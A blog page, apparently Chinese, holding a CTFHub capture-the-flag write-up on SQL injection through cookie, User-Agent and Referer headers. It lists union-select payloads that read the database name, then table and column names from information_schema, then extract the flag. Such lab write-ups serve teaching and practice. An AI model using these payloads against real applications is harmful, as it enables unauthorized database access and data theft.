热门标签
热门文章
- 12024年最新Stable Diffusion下载+安装+使用教程,收藏这一篇就够了!_stable diffusion 最新版本
- 2帆软(FineReport)---- 数据决策系统的基本配置
- 3git 本地链接到远程分支时,部分分支找不到_新拉去的代码不显示分支
- 42023年pmp的考试时间是什么时候?_pmp考试时间
- 5C语言输出100到999之间构成三位数的乘积等于三位数字的和的数字_编写程序输出100~999之间所有对称三位数
- 6【MATLAB】MATLAB向量与矩阵运算编程技巧_ones(m,1)
- 7pmdarima中的pipeline和autoarima_pmdarima.pipeline
- 8联邦学习【分布式机器学习技术】【①各客户端从服务器下载全局模型;②各客户端训练本地数据得到本地模型;③各客户端上传本地模型到中心服务器;④中心服务器接收各方数据后进行加权聚合操作,得全局模型】_联邦学习每个客户端的训练集
- 9【分享笔记】符尧:预训练、指令微调、对齐、专业化——论大语言模型能力的来源
- 10c++ 模板使用详解_c++模板的使用
当前位置: article > 正文
CTFHub技能树-Web-SQL注入_ctfhub web sql注入
作者:很楠不爱3 | 2024-05-01 23:25:23
赞
踩
ctfhub web sql注入
目录
一、cookie注入
1、进题目抓包
2、cookie处存在注入点,判断注入点类型
判断为数字型注入
3、列数和回显位置判断
使用order by 判断列数为2;
回显位置如下:
4、直接获取数据
(1)、表名
(2)、列名
(3)、flag
flag:ctfhub{a6cfdaf369745f386f20266f}
二、UA注入
1、抓包看注入点类型
数字型注入,字段数为2,回显如下:
2、其他步骤与cookie注入类似
- 1、获取数据库名
- id=-1 union select 1,database() #
-
- 2、获取表名
- id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
-
- 3、获取列名,我的表名是:afnyhykzod
- id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='afnyhykzod'#
-
- 4、获取数据,我获取到的列名是:tzbuzzpllg
- id=-1 union select 1,tzbuzzpllg from afnyhykzod #
flag如下:
三、Refer注入
1、hackbar勾选Refer
2、在Refer处进行注入,其他步骤类似
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/521029
推荐阅读
相关标签
